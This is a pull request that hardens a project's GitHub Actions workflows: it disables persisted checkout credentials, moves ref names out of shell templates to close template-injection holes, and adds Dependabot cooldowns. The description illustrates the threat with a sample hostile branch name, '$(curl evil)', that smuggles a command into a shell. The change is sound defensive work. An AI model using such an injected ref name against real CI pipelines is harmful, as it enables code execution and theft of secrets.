### PR TITLE
ci: clear zizmor template-injection + artipacked findings

### DIFF
--- a/.github/dependabot.yml
+++ b/.github/dependabot.yml
@@ -26,6 +26,8 @@ updates:
       github-codeql:
         patterns:
           - "github/codeql-action/*"
+    cooldown:
+      default-days: 7
 
   - package-ecosystem: "docker"
     directory: "/deploy/docker"
@@ -35,6 +37,8 @@ updates:
     labels:
       - "dependencies"
       - "docker"
+    cooldown:
+      default-days: 7
 
   # Python tooling consumed by CI (meson, and whatever else lands in
   # requirements-ci.txt). vcpkg and rebar3 are covered by dedicated
@@ -47,3 +51,5 @@ updates:
     labels:
       - "dependencies"
       - "ci"
+    cooldown:
+      default-days: 7

--- a/.github/workflows/ci-runner-image.yml
+++ b/.github/workflows/ci-runner-image.yml
@@ -26,6 +26,8 @@ jobs:
       packages: write   # docker push to ghcr.io
     steps:
       - uses: actions/checkout@de0fac2e4500dabe0009e67214ff5f5447ce83dd # v6.0.2
+        with:
+          persist-credentials: false
 
       - name: Set lowercase owner
         id: owner
@@ -62,6 +64,8 @@ jobs:
       packages: write   # docker push to ghcr.io
     steps:
       - uses: actions/checkout@de0fac2e4500dabe0009e67214ff5f5447ce83dd # v6.0.2
+        with:
+          persist-credentials: false
 
       - name: Set lowercase owner
         id: owner

--- a/.github/workflows/ci.yml
+++ b/.github/workflows/ci.yml
@@ -96,6 +96,8 @@ jobs:
       all_healthy: ${{ steps.health.outputs.all_healthy }}
     steps:
       - uses: actions/checkout@de0fac2e4500dabe0009e67214ff5f5447ce83dd # v6.0.2
+        with:
+          persist-credentials: false
       - name: Probe runner health
         id: health
         env:
@@ -131,6 +133,7 @@ jobs:
         with:
           # Need history so buf can compare against the merge base
           fetch-depth: 0
+          persist-credentials: false
       - uses: bufbuild/buf-setup-action@a47c93e0b1648d5651a065437926377d060baa99 # v1.50.0
         with:
           version: "1.50.0"
@@ -200,6 +203,7 @@ jobs:
           # handled by the vcpkg sentinel. Manual recovery: scripts/ci/
           # runner-reset.sh.
           clean: false
+          persist-credentials: false
 
       - name: Install system packages
         run: |
@@ -399,6 +403,7 @@ jobs:
           # clean:false — persist build-windows-{debug,release}/ +
           # vcpkg_installed/ between runs. Manual recovery: scripts/ci/runner-reset.sh.
           clean: false
+          persist-credentials: false
 
       - name: Setup MSVC
         uses: ilammy/msvc-dev-cmd@0b201ec74fa43914dc39ae48a89fd1d8cb592756 # v1.13.0
@@ -553,6 +558,7 @@ jobs:
       - uses: actions/checkout@de0fac2e4500dabe0009e67214ff5f5447ce83dd # v6.0.2
         with:
           submodules: recursive
+          persist-credentials: false
 
       - name: Install dependencies
         run: |
@@ -701,6 +707,7 @@ jobs:
       - uses: actions/checkout@de0fac2e4500dabe0009e67214ff5f5447ce83dd # v6.0.2
         with:
           fetch-depth: 0
+          persist-credentials: false
       - id: detect
         run: |
           # PRs diff against the base ref; pushes diff against the SHA
@@ -740,6 +747,7 @@ jobs:
       - uses: actions/checkout@de0fac2e4500dabe0009e67214ff5f5447ce83dd # v6.0.2
         with:
           submodules: recursive
+          persist-credentials: false
 
       - name: Install system packages
         run: |

--- a/.github/workflows/codeql.yml
+++ b/.github/workflows/codeql.yml
@@ -135,6 +135,7 @@ jobs:
         with:
           submodules: recursive
           clean: false
+          persist-credentials: false
 
       # ─── MSVC environment (Windows only) ──────────────────────────
       # CLAUDE.md forbids direct use of vcvars64.bat because it returns

--- a/.github/workflows/docs-lint.yml
+++ b/.github/workflows/docs-lint.yml
@@ -36,6 +36,8 @@ jobs:
     timeout-minutes: 5
     steps:
       - uses: actions/checkout@de0fac2e4500dabe0009e67214ff5f5447ce83dd # v6.0.2
+        with:
+          persist-credentials: false
 
       - name: Verify CHANGELOG.md is in reverse chronological order
         run: python3 tests/test_changelog_order.py

--- a/.github/workflows/nightly.yml
+++ b/.github/workflows/nightly.yml
@@ -62,6 +62,7 @@ jobs:
         with:
           submodules: recursive
           clean: false
+          persist-credentials: false
 
       - name: Install system packages
         run: |
@@ -143,6 +144,7 @@ jobs:
         with:
           submodules: recursive
           clean: false
+          persist-credentials: false
 
       - name: Install system packages
         run: |
@@ -223,6 +225,7 @@ jobs:
         with:
           submodules: recursive
           clean: false
+          persist-credentials: false
 
       - name: Install system packages
         run: |
@@ -335,6 +338,8 @@ jobs:
     steps:
       - name: Open or update nightly-broken issue
         uses: actions/github-script@3a2844b7e9c422d3c10d287c895573f7108da1b3 # v9.0.0
+        env:
+          REF_NAME: ${{ github.ref_name }}
         with:
           script: |
             const label = 'nightly-broken';
@@ -348,8 +353,9 @@ jobs:
               : 'unknown (alert fired without specific job failures)';
             const runUrl = `${{ github.server_url }}/${{ github.repository }}/actions/runs/${{ github.run_id }}`;
             const sha = '${{ github.sha }}';
+            const refName = process.env.REF_NAME;
             const body = [
-              `Nightly run failed on \`${{ github.ref_name }}\` @ \`${sha.substring(0, 7)}\`.`,
+              `Nightly run failed on \`${refName}\` @ \`${sha.substring(0, 7)}\`.`,
               ``,
               `**Failed jobs:** ${summary}`,
               ``,

--- a/.github/workflows/pre-release.yml
+++ b/.github/workflows/pre-release.yml
@@ -36,6 +36,8 @@ jobs:
 
     steps:
       - uses: actions/checkout@de0fac2e4500dabe0009e67214ff5f5447ce83dd # v6.0.2
+        with:
+          persist-credentials: false
 
       - name: Determine version
         id: ver
@@ -115,6 +117,8 @@ jobs:
 
     steps:
       - uses: actions/checkout@de0fac2e4500dabe0009e67214ff5f5447ce83dd # v6.0.2
+        with:
+          persist-credentials: false
 
       - name: Login to GHCR
         uses: docker/login-action@4907a6ddec9925e35a0a9e82d7399ccc52663121 # v4.1.0
@@ -583,6 +587,8 @@ jobs:
     timeout-minutes: 15
     steps:
       - uses: actions/checkout@de0fac2e4500dabe0009e67214ff5f5447ce83dd # v6.0.2
+        with:
+          persist-credentials: false
 
       - name: Login to GHCR
         uses: docker/login-action@4907a6ddec9925e35a0a9e82d7399ccc52663121 # v4.1.0
@@ -644,6 +650,8 @@ jobs:
     timeout-minutes: 25
     steps:
       - uses: actions/checkout@de0fac2e4500dabe0009e67214ff5f5447ce83dd # v6.0.2
+        with:
+          persist-credentials: false
 
       - name: Login to GHCR
         uses: docker/login-action@4907a6ddec9925e35a0a9e82d7399ccc52663121 # v4.1.0
@@ -796,6 +804,8 @@ jobs:
     timeout-minutes: 15
     steps:
       - uses: actions/checkout@de0fac2e4500dabe0009e67214ff5f5447ce83dd # v6.0.2
+        with:
+          persist-credentials: false
 
       - name: Login to GHCR
         uses: docker/login-action@4907a6ddec9925e35a0a9e82d7399ccc52663121 # v4.1.0

--- a/.github/workflows/qodana_code_quality.yml
+++ b/.github/workflows/qodana_code_quality.yml
@@ -34,6 +34,7 @@ jobs:
         with:
           ref: ${{ github.event.pull_request.head.sha }}
           fetch-depth: 0
+          persist-credentials: false
 
       - name: 'Qodana Scan'
         uses: JetBrains/qodana-action@d7b5ec2fbec32197ef447c450e00589ed5f34fd5 # v2025.3

--- a/.github/workflows/release.yml
+++ b/.github/workflows/release.yml
@@ -52,6 +52,7 @@ jobs:
         with:
           submodules: recursive
           clean: false
+          persist-credentials: false
 
       - name: Verify build dependencies
         run: |
@@ -246,6 +247,8 @@ jobs:
 
     steps:
       - uses: actions/checkout@de0fac2e4500dabe0009e67214ff5f5447ce83dd # v6.0.2
+        with:
+          persist-credentials: false
 
       - name: Install Erlang/OTP and rebar3
         uses: erlef/setup-beam@fc68ffb90438ef2936bbb3251622353b3dcb2f93 # v1.24.0
@@ -401,6 +404,7 @@ jobs:
       - uses: actions/checkout@de0fac2e4500dabe0009e67214ff5f5447ce83dd # v6.0.2
         with:
           submodules: recursive
+          persist-credentials: false
 
       - name: Setup MSVC
         uses: ilammy/msvc-dev-cmd@0b201ec74fa43914dc39ae48a89fd1d8cb592756 # v1.13.0
@@ -520,7 +524,7 @@ jobs:
       - name: Package archive
         shell: pwsh
         run: |
-          $version = "${{ github.ref_name }}".TrimStart("v").Replace("-", "_")
+          $version = "$env:GITHUB_REF_NAME".TrimStart("v").Replace("-", "_")
           $staging = "yuzu-${version}-windows-x64"
           New-Item -ItemType Directory -Force -Path "${staging}/bin", "${staging}/plugins", "${staging}/content/definitions"
 
@@ -548,7 +552,7 @@ jobs:
       - name: Build Windows installers (InnoSetup)
         shell: pwsh
         run: |
-          $version = "${{ github.ref_name }}".TrimStart("v").Replace("-", "_")
+          $version = "$env:GITHUB_REF_NAME".TrimStart("v").Replace("-", "_")
 
           # Install InnoSetup 6
           choco install innosetup -y --no-progress
@@ -590,7 +594,7 @@ jobs:
           WINDOWS_SIGNING_CERT_PASSWORD: ${{ secrets.WINDOWS_SIGNING_CERT_PASSWORD }}
         shell: pwsh
         run: |
-          $version = "${{ github.ref_name }}".TrimStart("v").Replace("-", "_")
+          $version = "$env:GITHUB_REF_NAME".TrimStart("v").Replace("-", "_")
 
           $certPath = "${{ runner.temp }}\signing-cert.pfx"
           [IO.File]::WriteAllBytes($certPath, [Convert]::FromBase64String($env:WINDOWS_SIGNING_CERT))
@@ -692,6 +696,7 @@ jobs:
       - uses: actions/checkout@de0fac2e4500dabe0009e67214ff5f5447ce83dd # v6.0.2
         with:
           submodules: recursive
+          persist-credentials: false
 
       - name: Install dependencies
         run: |
@@ -1026,6 +1031,7 @@ jobs:
         with:
           submodules: recursive
           clean: false
+          persist-credentials: false
 
       - name: Lowercase repository owner
         id: owner
@@ -1170,6 +1176,8 @@ jobs:
 
     steps:
       - uses: actions/checkout@de0fac2e4500dabe0009e67214ff5f5447ce83dd # v6.0.2
+        with:
+          persist-credentials: false
 
       - name: Validate docker-compose image versions
         run: |
@@ -1339,7 +1347,7 @@ jobs:
       - name: Generate release notes
         run: |
           OWNER="${{ github.repository_owner }}"
-          TAG="${{ github.ref_name }}"
+          TAG="${GITHUB_REF_NAME}"
 
           # Start with changelog content if available
           if [ "${{ steps.changelog.outputs.has_changelog }}" = "true" ]; then
@@ -1468,8 +1476,8 @@ jobs:
             WIZARD_ASSET+=(artifacts/yuzu-compose-wizard-*.zip)
           fi
 
-          gh release create "${{ github.ref_name }}" \
-            --title "Yuzu ${{ github.ref_name }}" \
+          gh release create "${GITHUB_REF_NAME}" \
+            --title "Yuzu ${GITHUB_REF_NAME}" \
             --notes-file release-notes.md \
             ${PRERELEASE_FLAG} \
             artifacts/yuzu-linux-x64.tar.gz \

--- a/.github/workflows/runner-inventory-sentinel.yml
+++ b/.github/workflows/runner-inventory-sentinel.yml
@@ -63,6 +63,8 @@ jobs:
 
     steps:
       - uses: actions/checkout@de0fac2e4500dabe0009e67214ff5f5447ce83dd # v6.0.2
+        with:
+          persist-credentials: false
 
       - name: Check runner inventory against declaration
         id: check

--- a/.github/workflows/sanitizer-tests.yml
+++ b/.github/workflows/sanitizer-tests.yml
@@ -64,6 +64,7 @@ jobs:
       - uses: actions/checkout@de0fac2e4500dabe0009e67214ff5f5447ce83dd # v6.0.2
         with:
           submodules: recursive
+          persist-credentials: false
 
       - name: Assert toolchain available
         run: |
@@ -181,6 +182,7 @@ jobs:
       - uses: actions/checkout@de0fac2e4500dabe0009e67214ff5f5447ce83dd # v6.0.2
         with:
           submodules: recursive
+          persist-credentials: false
 
       - name: Assert toolchain available
         run: |

--- a/.github/workflows/vcpkg-baseline-update.yml
+++ b/.github/workflows/vcpkg-baseline-update.yml
@@ -27,6 +27,8 @@ jobs:
       pull-requests: write    # peter-evans/create-pull-request: open/update PR
     steps:
       - uses: actions/checkout@de0fac2e4500dabe0009e67214ff5f5447ce83dd # v6.0.2
+        with:
+          persist-credentials: false
 
       - name: Resolve latest vcpkg master SHA
         id: latest


### PR DESCRIPTION
## Summary

Clears 7 of 9 zizmor HIGH `template-injection` findings and all 30 MEDIUM `artipacked` findings + 3 MEDIUM `dependabot-cooldown`. Total drops from **9H/33M/22I → 2H/0M/22I**.

## What changed

**Template injection (HIGH, 7 sites)** — `${{ github.ref_name }}` was interpolated directly into shell run-blocks (PowerShell on `release.yml`, bash on `release.yml` + `nightly.yml`'s `actions/github-script`). On `push` events ref names are attacker-controllable to a degree (e.g. branch named `\$(curl evil)`); zizmor's audit confidence is High because the expansion lands in a shell. Rebound to env:

- `release.yml:524, 552, 594` — `\$version = \"\${{ github.ref_name }}\"` → `\$version = \"\$env:GITHUB_REF_NAME\"`
- `release.yml:1342, 1471` — `TAG=\"\${{ github.ref_name }}\"` and `gh release create \"\${{ github.ref_name }}\"` → `\${GITHUB_REF_NAME}` (set by the runner on every trigger)
- `nightly.yml:355` — bind `env: REF_NAME:` on the `actions/github-script` step and read via `process.env.REF_NAME`

**Artipacked (MEDIUM, 30 sites)** — added `persist-credentials: false` to every `actions/checkout` across 11 workflows. None of these workflows perform `git push` / `git config user` / `gh auth` against the persisted credential. `peter-evans/create-pull-request@v8` in `vcpkg-baseline-update.yml` uses its own `GITHUB_TOKEN` env (not the persisted credential), so no regression.

**Dependabot cooldown (MEDIUM, 3 sites)** — added `cooldown.default-days: 7` to all three ecosystems in `dependabot.yml`.

## What's left after this PR

2 HIGH, both unavoidable trigger-pattern findings:
- `cla.yml` — `pull_request_target` is required by CLA-Assistant; ref discipline is already in place.
- `pre-release.yml` — `workflow_run` is required to chain off the Release workflow.

22 INFO — all `template-injection` Low-confidence cases in `vcpkg-baseline-update.yml` where the source is a SHA-shaped step output (very low exploitability). Can be cleared in a follow-up if desired.

## Test plan

- [x] `python3 -c \"yaml.safe_load(...)\"` parses every modified YAML
- [x] Local `zizmor --min-severity=high ./.github` returns just the 2 expected trigger-pattern findings
- [x] Zizmor CI job posts SARIF that matches local result
- [x] Existing CI workflows still green on this PR's commit

🤖 Generated with [Claude Code](https://claude.com/claude-code)